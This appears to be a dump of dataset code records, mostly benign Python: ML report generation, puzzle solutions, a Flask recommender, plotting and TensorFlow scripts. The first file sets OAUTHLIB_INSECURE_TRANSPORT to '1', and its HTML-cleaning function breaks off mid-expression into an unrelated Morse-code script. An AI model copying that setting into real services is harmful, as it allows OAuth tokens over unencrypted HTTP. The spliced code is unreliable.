ALL_MODELS_TRAINING_CSV_METRICS\n)\nfrom report_helper.html_render import make_pdf_report\n\nos.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\nTEMP_FOLDER = os.environ['OSDR_TEMP_FILES_FOLDER']\nREDIS_CLIENT = redis.StrictRedis(host='redis', db=0)\nLOGGER = BaseMLLogger(\n log_name='logger', log_file_name='sds-ml-training-reporter')\nOPTIMIZER_FORMATTER = '{:.04f}'.format\n\n\n@MLExceptionHandler(\n logger=LOGGER, fail_publisher=TRAINING_REPORT_GENERATION_FAILED,\n fail_message_constructor=training_report_generation_failed\n)\ndef generate_training_report(body):\n \"\"\"\n Pika callback 
function used by training report generator.\n Make plots files, general metrics csv file and report file if success.\n\n :param body: RabbitMQ MT message's body\n \"\"\"\n\n oauth = get_oauth()\n fetch_token(oauth)\n\n # define using variables for ml reporter\n model = body['Models'][0]\n model_blob_id = model['blobId']\n file_info = get_file_info_from_blob(oauth, model_blob_id).json()\n if 'ModelInfo' in file_info['metadata'].keys():\n info_key = 'ModelInfo'\n elif 'modelInfo' in file_info['metadata'].keys():\n info_key = 'modelInfo'\n else:\n raise KeyError('No model info')\n model_info = json.loads(file_info['metadata'][info_key])\n body['Bins'] = model_info['Bins']\n model_name = model_info['ModelName']\n model_type = model_info['ModelType']\n base_folder = '{}/general_training_report_{}'.format(\n TEMP_FOLDER, uuid.uuid1())\n make_directory(base_folder)\n LOGGER.info('MODEL INFO: {}'.format(model_info))\n LOGGER.info('MODEL NAME: {}'.format(model_name))\n LOGGER.info('MODEL TYPE: {}'.format(model_type))\n\n # generate general metrics dict\n all_models_metrics = []\n for model in body['Models']:\n # if something wrong with model file from blob storage\n if 'genericFiles' not in model.keys():\n raise TypeError('Empty model\\'s generic files blob ids')\n\n for file_blob_id in model['genericFiles']:\n file_info = get_file_info_from_blob(oauth, file_blob_id).json()\n if 'fileInfo' in file_info['metadata'].keys():\n fileinfo_key = 'fileInfo'\n elif 'FileInfo' in file_info['metadata'].keys():\n fileinfo_key = 'FileInfo'\n else:\n raise KeyError('No fileInfo key in: {}'.format(\n file_info['metadata'].keys()))\n\n file_info = json.loads(file_info['metadata'][fileinfo_key])\n\n if 'fileType' in file_info.keys():\n filetype_key = 'fileType'\n elif 'FileType' in file_info.keys():\n filetype_key = 'FileType'\n else:\n filetype_key = None\n\n if filetype_key and file_info[filetype_key] == TRAINING_CSV_METRICS:\n csv_blob_id = file_blob_id\n csv_model_metrics = get_file_from_blob(\n csv_blob_id, oauth).content\n all_models_metrics.append(csv_model_metrics.decode())\n\n LOGGER.info('CURRENT MODEL INFO: {}'.format(file_info))\n\n LOGGER.info('ALL MODELS METRICS: {}'.format(all_models_metrics))\n # write general metrics data to csv file\n csv_files_names = write_csvs_files(all_models_metrics)\n general_csv_dict = merge_csv_files(csv_files_names)\n rows = make_general_csv_rows(general_csv_dict)\n general_csv_file_path = write_rows_to_csv_file(rows, base_folder)\n metrics = html_metrics_from_dict(general_csv_dict)\n\n fetch_token(oauth)\n # make csv info for blob storage\n general_csv_info = {\n 'FileInfo': json.dumps({\n 'modelName': model_name,\n 'fileType': ALL_MODELS_TRAINING_CSV_METRICS\n }),\n 'SkipOsdrProcessing': 'true'\n }\n # make multipart object prepared to POST to blob storage\n # include csv file and file info\n multipart_general_csv = get_multipart_object(\n body, general_csv_file_path, 'text/csv',\n additional_fields=general_csv_info\n )\n # POST metrcis csv file to blob storage\n post_data_to_blob(oauth, multipart_general_csv)\n\n # create general images\n body['NumberOfGenericFiles'] = 0\n path_to_radar_plot = None\n try:\n if model_type == CLASSIFIER:\n LOGGER.info('Creating radar_plot')\n nbits = body['Bins']\n path_to_radar_plot = radar_plot(\n general_csv_file_path, base_folder, nbits,\n titlename=model_name\n )\n # make radar plot multipart encoded object\n multipart_radar_plot = get_multipart_object(\n body, path_to_radar_plot, 'image/png',\n additional_fields={'correlationId': 
body['CorrelationId']}\n )\n\n # send, http POST request to blob storage api with radar plot\n post_data_to_blob(oauth, multipart_radar_plot)\n body['NumberOfGenericFiles'] += 1\n except:\n # log error traceback\n logging_exception_message(LOGGER)\n raise Exception('Post generic data exception')\n\n optimizer_metrics = REDIS_CLIENT.get(\n 'optimizer_metrics_{}'.format(body['CorrelationId']))\n\n if optimizer_metrics:\n optimizer_metrics = html_optimal_metrics_from_dict(\n json.loads(optimizer_metrics), model_type)\n\n # add metrics and images to pdf report file\n context = {\n 'metrics': metrics,\n 'radar_plots': [path_to_radar_plot],\n 'optimizer': optimizer_metrics\n }\n pdf_path = make_pdf_report(base_folder, context, model_name='general')\n fetch_token(oauth)\n multipart_general_csv = get_multipart_object(\n body, pdf_path, 'application/pdf',\n additional_fields={'correlationId': body['CorrelationId']}\n )\n post_data_to_blob(oauth, multipart_general_csv)\n body['NumberOfGenericFiles'] += 1\n\n # remove temporary directory\n shutil.rmtree(base_folder, ignore_errors=True)\n\n report_generated = training_report_generated_message(body)\n model_report_generated_message_publisher = PurePublisher(REPORT_GENERATED)\n model_report_generated_message_publisher.publish(report_generated)\n\n LOGGER.info('Report generated!')\n\n return None\n\n\ndef html_optimal_metrics_from_dict(optimal_metrics_dict, model_type):\n \"\"\"\n Method to convert training metrics from dict to html table\n\n :param optimal_metrics_dict: training metrics\n :param model_type: type of model, regression or classification\n :type optimal_metrics_dict: dict\n :type model_type: str\n :return: training metrics as html\n :rtype: str\n \"\"\"\n\n formatted_metrics = TMP_TMP(optimal_metrics_dict, model_type)\n\n # make pandas dataframe from dict\n metrics_as_pandas = DataFrame.from_dict(\n formatted_metrics, orient='index'\n ).sort_index().rename(\n index={'0': 'Descriptors/Fingerprints'}\n )\n\n # convert metrics from OrderedDict to html\n # remove \"bad\" symbols from html metrics\n metrics = metrics_as_pandas.to_html(\n header=False\n ).replace(\n 'th>', 'td>'\n ).replace(\n '', 'td>'\n ).replace(\n 'english')\n user_input = input(\"Please enter in a word or a phrase and I will convert it to english! Rules: Add a space after each letter and then a '//' after each word.\")\n convert_input_to_english(f\"{user_input} //\")\n\n elif which_two.lower() == \"no\":\n print('okay! Next time!')\n \nelif which_one.lower()==\"yes\":\n user_input = input(\"Please enter in a word or a phrase and I will convert it to morse code! Rules: No symbols, besides periods.\")\n convert_input_to_morse(user_input)\nelse: \n print('Okay, maybe you added a weird space. 
Try again!')\n\n\n\n\n\n","sub_path":"morse.py","file_name":"morse.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624085596","text":"\"\"\"Shortest-path search between two nodes of an unweighted graph\"\"\"\n\nclass Queue:\n    \"\"\"A simple queue implementation, with no fullness checking\n    >>> queue = Queue()\n    >>> queue.push(1)\n    >>> queue.push(2)\n    >>> queue.push(3)\n    >>> print(queue.is_empty())\n    False\n    >>> print(queue.pop())\n    1\n    >>> print(queue.pop())\n    2\n    >>> print(queue.pop())\n    3\n    >>> print(queue.is_empty())\n    True\n    \"\"\"\n    class Element:\n        def __init__(self, nxt, value):\n            self.nxt = nxt\n            self.value = value\n\n    def __init__(self):\n        self.head = None\n        self.tail = None\n\n    def is_empty(self):\n        return self.head is None\n\n    def push(self, value):\n        if self.is_empty():\n            self.tail = self.head = Queue.Element(None, value)\n        else:\n            self.tail.nxt = Queue.Element(None, value)\n            self.tail = self.tail.nxt\n\n    def pop(self):\n        buf = self.head.value\n        self.head = self.head.nxt\n        return buf\n\nqueue = Queue()\n\nn, m, x, y = map(int, input().split(\" \"))\n\nG = [[] for i in range(n)]\npath = [-1]*n\nfor i in range(m):\n    k, v = map(int, input().split(\" \"))\n    G[k].append(v)\n    G[v].append(k)\n\ndef find_path(G, x, y, queue, path):\n    path[x] = 0\n    queue.push(x)\n    while not queue.is_empty():\n        x = queue.pop()\n        for i in G[x]:\n            if path[i] == -1:\n                path[i] = path[x] + 1\n                if i == y:\n                    return\n                queue.push(i)\n\nfind_path(G, x, y, queue, path)\nprint(path[y])\n\n\n\n","sub_path":"47.py","file_name":"47.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"497705671","text":"class Solution(object):\n    def isAlienSorted(self, words, order):\n        \"\"\"\n        :type words: List[str]\n        :type order: str\n        :rtype: bool\n        \"\"\"\n        orderSet = {}\n        for i, c in enumerate(order):\n            orderSet[c] = i\n\n        for i in range(1, len(words)):\n            if self.isLarger(words[i-1], words[i], orderSet):\n                return False\n\n        return True\n\n    def isLarger(self, a, b, orderSet):\n        # treat out of bound char as rank/order -1\n        for i in range(len(a)):\n            oa = orderSet[a[i]]\n            ob = orderSet[b[i]] if i < len(b) else -1\n            if oa < ob:\n                return False\n            if oa > ob:\n                return True\n        return False","sub_path":"src2/verifying-an-alien-dictionary/s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211933760","text":"import logging\n\nfrom dancedeets import app\nfrom dancedeets import base_servlet\nfrom dancedeets import fb_api\nfrom dancedeets.mail import mailchimp_api\nfrom dancedeets.util import fb_mapreduce\nfrom dancedeets.users import users\n\n\nclass LookupAppFriendUsers(fb_api.LookupType):\n    @classmethod\n    def get_lookups(cls, object_id):\n        return [('info', cls.url('%s/friends' % object_id))]\n\n\n@app.route('/tasks/track_newuser_friends')\nclass TrackNewUserFriendsHandler(base_servlet.BaseTaskFacebookRequestHandler):\n    def get(self):\n        key = fb_api.generate_key(LookupAppFriendUsers, self.fb_uid)\n        fb_result = self.fbl.fb.fetch_keys([key])\n        app_friend_list = fb_result[key]['info']\n        logging.info('app_friend_list is %s', app_friend_list)\n        user_friends = users.UserFriendsAtSignup.get_or_insert(self.fb_uid)\n        user_friends.registered_friend_string_ids = [x['id'] for x in app_friend_list['data']]\n        user_friends.put()\n\n    post = 
get\n\n\n@app.route('/tasks/load_users')\nclass LoadUserHandler(base_servlet.UserOperationHandler):\n user_operation = lambda self, fbl, load_users: [load_fb_user(fbl, x) for x in load_users]\n\n\n@app.route('/tasks/reload_all_users')\nclass ReloadAllUsersHandler(base_servlet.BaseTaskFacebookRequestHandler):\n def get(self):\n all_users = self.request.get('all_users', '0') == '1'\n if all_users:\n filters = []\n else:\n filters = [('expired_oauth_token', '=', False)]\n # this calls a map function wrapped by mr_user_wrap, so it works correctly on a per-user basis\n mailchimp_list_id = mailchimp_api.get_list_id()\n fb_mapreduce.start_map(\n fbl=self.fbl,\n name='Load %sUsers' % ('All ' if all_users else ''),\n handler_spec='dancedeets.users.user_tasks.map_load_fb_user',\n entity_kind='dancedeets.users.users.User',\n filters=filters,\n extra_mapper_params={\n 'mailchimp_list_id': mailchimp_list_id,\n },\n queue='fast-queue'\n )\n\n post = get\n\n\ndef yield_load_fb_user(fbl, user):\n if user.expired_oauth_token:\n logging.info('Skipping user %s (%s) due to expired access_token', user.fb_uid, user.full_name)\n user.put()\n elif not fbl.access_token:\n logging.info('Skipping user %s (%s) due to not having an access_token', user.fb_uid, user.full_name)\n user.put()\n else:\n fetch_and_save_fb_user(fbl, user)\n # The above function calls user.put(), so no need for:\n # users.update_mailchimp(user)\n\n\ndef fetch_and_save_fb_user(fbl, user):\n try:\n fb_user = fbl.get(fb_api.LookupUser, user.fb_uid)\n except fb_api.ExpiredOAuthToken as e:\n logging.info('Auth token now expired, mark as such: %s', e)\n user.expired_oauth_token_reason = e.args[0]\n user.expired_oauth_token = True\n user.put()\n return\n else:\n user.compute_derived_properties(fb_user)\n user.put()\n\n\nmap_load_fb_user = fb_mapreduce.mr_user_wrap(yield_load_fb_user)\nload_fb_user = fb_mapreduce.nomr_wrap(yield_load_fb_user)\n","sub_path":"server/dancedeets/users/user_tasks.py","file_name":"user_tasks.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218228097","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport re\nimport argparse\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom operator import itemgetter\nimport matplotlib\n\nmatplotlib.rcParams.update({'font.size': 18})\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ncommandLineParser = argparse.ArgumentParser(description='Compute features from labels.')\n# commandLineParser.add_argument ('INPUT', type=str, choices= ['question_name', 'question_index', 'question_text'], default = 'question_name',\n# help = 'Select input type')\n# commandLineParser.add_argument ('OUTPUT', type=str, choices= ['question_names', 'question_index', 'question_text'], default = 'question_index',\n# help = 'Select output type')\ncommandLineParser.add_argument('sorted_topics', type=str,\n help='Input')\ncommandLineParser.add_argument('key_topics', type=str,\n help='Input')\ncommandLineParser.add_argument('alignment_matrix', type=str,\n help='Input')\ncommandLineParser.add_argument('unigrams', type=str,\n help='Input')\ncommandLineParser.add_argument('auc', type=str, default=None,\n help='Input')\ncommandLineParser.add_argument('--fold', type=str, default=None,\n help='Input')\n\n\ndef main(argv=None):\n args = commandLineParser.parse_args()\n sec_dict = {}\n for section in ['SC', 'SD', 'SE']:\n with 
open('/home/malinin/dnn_lib/attention_grader/script-maps/scripts-' + section + '-map.txt', 'r') as f:\n for line in f.readlines():\n line = line.replace('\\n', '').split()\n line = ' '.join(line[2:])\n if not sec_dict.has_key(line):\n if section == 'SC':\n sec_dict[line] = 0\n elif section == 'SD':\n sec_dict[line] = 1\n else:\n sec_dict[line] = 2\n\n topic_sec_ids = []\n ids_tuples = []\n topics = []\n with open(args.sorted_topics, 'r') as f:\n for line in f.readlines():\n topics.append(line)\n line = line.replace('\\n', '')\n line = re.sub(r'^.* ', r'', line)\n topic_sec_ids.append(sec_dict[line])\n for topic_sec_id, i in zip(topic_sec_ids, xrange(len(topic_sec_ids))):\n ids_tuples.append((topic_sec_id, i))\n\n with open('topic_ids.txt', 'w') as f:\n for ids in ids_tuples:\n f.write(str(ids[0]) + '\\n')\n\n key_sec_ids = []\n key_tuples = []\n with open(args.key_topics, 'r') as f:\n for line in f.readlines():\n line = line.replace('\\n', '')\n line = re.sub(r'^.* ', r'', line)\n key_sec_ids.append(sec_dict[line])\n for key_sec_id, i in zip(key_sec_ids, xrange(len(key_sec_ids))):\n key_tuples.append((key_sec_id, i))\n\n sorted_ids_tuples = sorted(ids_tuples, key=itemgetter(0, 1))\n sorted_key_tuples = sorted(key_tuples, key=itemgetter(0, 1))\n alignment_matrix = np.loadtxt(args.alignment_matrix)\n plt.matshow(alignment_matrix, cmap=plt.cm.plasma)\n # plt.show()\n plt.close()\n sorted_alignment_matrix = np.zeros_like(alignment_matrix)\n for i, x in zip(sorted_ids_tuples, xrange(len(sorted_ids_tuples))):\n for j, y in zip(sorted_key_tuples, xrange(len(sorted_key_tuples))):\n sorted_alignment_matrix[y][x] = alignment_matrix[j[1]][i[1]]\n plt.matshow(sorted_alignment_matrix, cmap=plt.cm.plasma)\n # plt.show()\n plt.close()\n entropy = np.sum(-alignment_matrix * np.log(alignment_matrix + 1e-8), axis=1)\n _, keys = zip(*sorted(zip(entropy, np.asarray(key_tuples)[:, 1]), key=itemgetter(0)))\n unigrams = np.loadtxt(args.unigrams)\n print(keys)\n with open('new_sorted_topics.txt', 'w') as f:\n for i in keys:\n f.write(topics[i])\n sorted_entropy, _ = zip(*sorted(zip(entropy, np.asarray(key_tuples)[:, 0]), key=itemgetter(1, 0)))\n aucs = np.loadtxt(args.auc)\n\n plt.plot(sorted_entropy, c='b', lw=3.0)\n plt.axvline(x=52, lw=2.0, ls='--', c='k')\n plt.axvline(x=106, lw=2.0, ls='--', c='k')\n plt.text(19, 5, r'SC', fontsize=22)\n plt.text(70, 5, r'SD', fontsize=22)\n plt.text(200, 5, r'SE', fontsize=22)\n plt.xlim(0, 379)\n plt.ylabel('Entropy')\n plt.xlabel('Topics')\n plt.savefig('attention_entropy.png', bbox_inches='tight')\n # plt.show()\n plt.close()\n fig, ax1 = plt.subplots()\n ax2 = ax1.twinx()\n ax1.set_ylabel('Entropy')\n ax1.set_xlabel('Fraction of Topics')\n # plt.ylabel('Entropy')\n # plt.xlim(0,379)\n ax1.plot([i / 379.0 for i in xrange(379)], sorted(entropy, reverse=True), c='r', lw=3.0)\n ax2.set_ylabel('AUC')\n # ax2.set_xlim(0,76)\n # ax1.set_xlim(0,379)\n ax2.plot([i / 76.0 for i in xrange(76)], aucs, c='g', ls='--', lw=3.0)\n ax1.legend(['Entropy'], loc=4)\n ax2.legend(['AUC'], loc=3)\n plt.savefig('attention_entropy_auc.png', bbox_inches='tight')\n # plt.show()\n plt.close()\n\n if args.fold is None:\n plt.savefig('alignment_matrix.png', bbox_inches='tight')\n else:\n plt.savefig('alignment_matrix_fold' + args.fold + '.png', bbox_inches='tight')\n plt.close()\n sys.exit()\n # print alignment_matrix\n confusion = np.zeros((3, 3), dtype=np.float32)\n for key, i in zip(key_sec_ids, xrange(len(key_sec_ids))):\n for topic, j in zip(topic_sec_ids, xrange(len(topic_sec_ids))):\n 
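# accumulate attention weight into the 3x3 section confusion matrix (SC/SD/SE)\n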
confusion[key][topic] += alignment_matrix[i][j]\n print(confusion) # , np.sum(confusion,axis=1)\n confusion = confusion / np.sum(confusion, axis=1)[:, np.newaxis]\n print(confusion)\n plt.matshow(confusion, cmap=plt.cm.Blues)\n plt.savefig('confusion_matrix.png', bbox_inches='tight')\n plt.close()\n # plt.show()\n\n return 0\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"preprocessing/extract_section.py","file_name":"extract_section.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"537213670","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data', one_hot = True)\n\n# Buliding add_layer function\ndef add_Hidden_layer(inputs, in_size, out_size, activation_function=None):\n # add one more layer and return the output of this layer\n Weights = tf.Variable(tf.random_normal([in_size, out_size]))\n #biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n biases = tf.Variable(tf.constant(0.1, shape = [1, out_size]))\n Wx_plus_b = tf.matmul(inputs, Weights) + biases\n # dropout\n Wx_plus_b = tf.nn.dropout(Wx_plus_b, keep_prob)\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n \ndef add_output_layer(inputs, in_size, out_size, activation_function=None):\n # add one more layer and return the output of this layer\n Weights = tf.Variable(tf.random_normal([in_size, out_size]))\n #biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n biases = tf.Variable(tf.constant(0.1, shape = [1, out_size]))\n Wx_plus_b = tf.matmul(inputs, Weights) + biases\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n# Buliding Accuracy function\ndef compute_accuracy(v_xs, v_ys):\n global output_Layer\n y_pre = sess.run(output_Layer, feed_dict={xs: v_xs, keep_prob: 1})\n correct_prediction = tf.equal(tf.argmax(y_pre,1), tf.argmax(v_ys,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n result = sess.run(accuracy, feed_dict={xs: v_xs, ys: v_ys, keep_prob:1})\n return result\n\n# PlaceHolder\nkeep_prob = tf.placeholder(tf.float32)\nxs = tf.placeholder(tf.float32, [None, 784])\nys = tf.placeholder(tf.float32, [None, 10])\n\n# Tensorflow Nerual Network Step\n\n# add_layer(inputs, in_size, out_size, activation_function = None)\n# Step 1 activation function = softmax\n\n## Hidden layer 1\nhidden_Layer1 = add_Hidden_layer(xs, 784, 50, activation_function = tf.nn.sigmoid)\n## Hidden layer 2\nhidden_Layer2 = add_Hidden_layer(hidden_Layer1, 50, 40, activation_function = tf.nn.sigmoid)\n## Add output layer\noutput_Layer = add_output_layer(hidden_Layer2, 40, 10, activation_function = tf.nn.softmax)\n\n# Step 2 loss error method(loss function) = cross entropy\n#cross_entropy = tf.reduce_mean(-tf.reduce_sum(ys * tf.log(output_Layer),\n# reduction_indices=[1])) \n# Step 3 Gradient Descent\n#train_step = tf.train.GradientDescentOptimizer(0.4).minimize(cross_entropy)\n\n# Step 4 Set session and initializer\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nsaver = tf.train.import_meta_graph('/Github_rep/python_notebook/Tensorflow_notebook/model/DnnModel_test.ckpt.meta')\n#saver = tf.train.Saver()\nsaver.restore(sess, 
'/Github_rep/python_notebook/Tensorflow_notebook/model/DnnModel_test.ckpt')\nprint('==================')\nprint(compute_accuracy(mnist.test.images, mnist.test.labels))","sub_path":"Tensorflow_notebook/saverTest.py","file_name":"saverTest.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"448639266","text":"from __future__ import print_function\nimport acm, FRTBCreateHierarchyChoiceListCommon\nimport importlib\nimportlib.reload(FRTBCreateHierarchyChoiceListCommon)\n\nael_variables = [['Hierarchy', 'Hierarchy', acm.FHierarchy, FRTBCreateHierarchyChoiceListCommon.ValidHierarchies('Liquidity Horizon'), None, 1, 0, 'The Hierarchy where the choice list data is retreived.']]\n\ndef ael_main(parameters):\n hierarchy = parameters['Hierarchy']\n hierarchyName = hierarchy.Name()\n print ('---------------- Setup of FRTB hierarchy choice lists for \"' + hierarchyName + '\" ----------------')\n\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp())\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp() + ' Creating choice lists')\n choiceListPerTag = {\n 'Risk Class':FRTBCreateHierarchyChoiceListCommon.ChoiceListFromName('FRTB IMA Risk Class'),\n 'Risk Factor Category':FRTBCreateHierarchyChoiceListCommon.ChoiceListFromName('FRTB IMA Category')\n }\n\n hierarchyTree = acm.FHierarchyTree()\n hierarchyTree.Hierarchy = hierarchy\n\n levelColumn = FRTBCreateHierarchyChoiceListCommon.GetLevelColumn(hierarchy)\n\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp())\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp() + ' Creating choice list values')\n FRTBCreateHierarchyChoiceListCommon.AddChoiceListDataRecursive(hierarchyTree, hierarchyTree.RootNode(), levelColumn, choiceListPerTag)\n\n print ('---------------- Setup of FRTB hierarchy choice lists for \"' + hierarchyName + '\" finished ----------------')\n print ('---------------- Choice lists created for \"' + hierarchyName + '\", restart of client required ----------------')\n print ('')\n","sub_path":"Extensions/FRTB Components/FPythonCode/FRTBCreateIMAHierarchyChoiceLists.py","file_name":"FRTBCreateIMAHierarchyChoiceLists.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"617590257","text":"from flask import Flask,request, url_for, redirect, render_template\r\nimport pickle\r\nimport random\r\nimport pandas as pd\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\napp = Flask(__name__)\r\ndf = pd.read_csv('movie.csv')\r\nmodel = pickle.load(open('model.pkl','rb'))\r\n\r\n\r\ncosine_sim = cosine_similarity(model)\r\ndef find_title_from_index(index):\r\n return df[df.Rank == index][\"Title\"].values[0]\r\ndef find_index_from_title(title):\r\n if len(df[df.Title == title])==0:\r\n return -1\r\n return df[df.Title == title][\"Rank\"].values[0]\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('home.html')\r\n\r\n@app.route('/predict',methods=['POST','GET'])\r\n\r\ndef predict():\r\n movie_name = request.form['query']\r\n movie_index = find_index_from_title(movie_name)\r\n if movie_index==-1:\r\n return render_template('home.html', Your_Movie='{}'.format(\"Oops No Match Found\"))\r\n similar_movies = list(enumerate(cosine_sim[movie_index]))\r\n\r\n\r\n sorted_similar_movies = sorted(similar_movies, key=lambda x: x[1], reverse=True)[1:]\r\n\r\n i = 0\r\n lst=[]\r\n for element in sorted_similar_movies:\r\n 
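# element is an (index, similarity) pair; map the index back to its movie title\n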
lst.append(find_title_from_index(element[0]))\r\n i = i+1\r\n if i>5:\r\n break\r\n\r\n return render_template('home.html', Your_Movie='{}'.format(random.choice(lst)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"328094866","text":"import matplotlib.pyplot as plt\nimport pickle\nimport numpy as np\n\nrnns = ['LSTM', 'RNN', 'NSRNN2','EXPRNN']\nrnns_name = ['LSTM', 'RNN', 'nnRNN','EXPRNN']\n# colors = ['lb', '']\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(8, 8))\nfor idx,rnn in enumerate(rnns):\n with open('./pickle_files/'+rnn+'.pkl', 'rb') as handle:\n losses = pickle.load(handle)\n plt.plot(np.arange(1,801), losses, label=str(rnns_name[idx]))\n plt.title(\"Copy task for T=200\")\n plt.ylabel(\"Loss\")\n plt.xlabel(\"Iteration\")\n plt.xticks([0,200,400,600,800])\n# plt.ylim([0,1])\n# plt.yticks([0,0.25,0.5,0.75,1])\nax.legend()\nplt.show()\n","sub_path":"plot_addtask.py","file_name":"plot_addtask.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"35897555","text":"# noOfTerms = int(input(\"Enter the no. of terms : \"))\ntarget = int(input(\"Enter no. to be checked : \"))\nfirstNumber = 0\nsecondNumber = 1\nNextTerm = 0\nflag = True\nwhile(firstNumber <= target):\n # print(firstNumber,end=\" \")\n \n if(firstNumber == target):\n print(\"Yes\",target,\"is a fibonacci number\")\n flag = False\n break\n NextTerm = firstNumber + secondNumber\n firstNumber = secondNumber\n secondNumber = NextTerm\n\nif flag == True:\n print(target,\"is not a fibonacci number\")","sub_path":"general_algorithms/FibonacciSeries.py","file_name":"FibonacciSeries.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"625675579","text":"import json\n\npath = \"../data/math_results_\"\nname = lambda x: path + (str (x)) + \".json\" \nfiles = [json.load(open(name(x))) for x in range(0,64)]\nrawData = [{'u':datum['u'], 'v':datum['v'], 's':datum['s'], 't':datum['t']} \n for f in files for datum in f if datum]\n##print(rawData)\na = open(\"data1.json\", \"w\")\njson.dump(rawData,a)\n","sub_path":"dataAg.py","file_name":"dataAg.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"291610128","text":"\nimport re\nfrom collections import defaultdict, Counter\nfrom itertools import permutations, combinations,product\nfrom functools import lru_cache\nadj4 = [[0,1], [1,0], [-1,0], [0,-1]]\nadj8 = adj4+[[1,1], [-1,-1], [1,-1], [-1,1]]\n\ndef lmii(delim=\" \"):\n return list(map(int, input().split(delim)))\n\ndata = \"\"\"1007125\n13,x,x,41,x,x,x,x,x,x,x,x,x,569,x,29,x,x,x,x,x,x,x,x,x,x,x,x,x,x,x,x,19,x,x,x,23,x,x,x,x,x,x,x,937,x,x,x,x,x,37,x,x,x,x,x,x,x,x,x,x,17\"\"\"\n\n\ntest1 = \"\"\"939\n7,13,x,x,59,x,31,19\"\"\"\ntest2 = \"\"\"123\n17,x,13,19\"\"\"\ntest3 = \"\"\"\"\"\"\ntest4 = \"\"\"\"\"\"\nimport math\n\n\ndef extended_euclidean(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = extended_euclidean(b % a, a)\n return (g, x - (b // a) * y, y)\n\n # modular inverse driver function\n\n\ndef modinv(a, m):\n g, x, y = extended_euclidean(a, m)\n return x % m\n\n\n# function implementing Chinese remainder 
theorem\n# list m contains all the modulii\n# list x contains the remainders of the equations\ndef crt(m, x):\n # We run this loop while the list of\n # remainders has length greater than 1\n while True:\n\n # temp1 will contain the new value\n # of A. which is calculated according\n # to the equation m1' * m1 * x0 + m0'\n # * m0 * x1\n temp1 = modinv(m[1], m[0]) * x[0] * m[1] + \\\n modinv(m[0], m[1]) * x[1] * m[0]\n\n # temp2 contains the value of the modulus\n # in the new equation, which will be the\n # product of the modulii of the two\n # equations that we are combining\n temp2 = m[0] * m[1]\n\n # we then remove the first two elements\n # from the list of remainders, and replace\n # it with the remainder value, which will\n # be temp1 % temp2\n x.remove(x[0])\n x.remove(x[0])\n x = [temp1 % temp2] + x\n\n # we then remove the first two values from\n # the list of modulii as we no longer require\n # them and simply replace them with the new\n # modulii that we calculated\n m.remove(m[0])\n m.remove(m[0])\n m = [temp2] + m\n\n # once the list has only one element left,\n # we can break as it will only contain\n # the value of our final remainder\n if len(x) == 1:\n break\n\n # returns the remainder of the final equation\n return x[0]\ndef solve(data):\n\n lines = [i for i in data.splitlines()]\n\n targ = int(lines[0])\n bs = [i for i in lines[1].split(\",\")]\n ts = [(ind, int(bus)) for ind, bus in enumerate(bs) if bus!=\"x\"]\n ns = [int(bus) for t, bus in ts]\n ass = [bus-t for t, bus in ts]\n print(ns, ass)\n\n print(crt(ns, ass))\n\nsolve(test1)\nsolve(test2)\n#solve(test3)\n#solve(test4)\n\nsolve(data)\n\n\n\n\n\n\n","sub_path":"2020/Days - 1-15/Day 13/13_2.py","file_name":"13_2.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"94976536","text":"import argparse # modulo para adicionar argumentos de linha ao python\n\n# Definição do vetor de caracteres usado nos códigos\ncaracteres = []\n\n# Caracteres de A à Z\nfor i in range(26):\n caracteres.append(chr(i + 65))\n# Caracteres de a 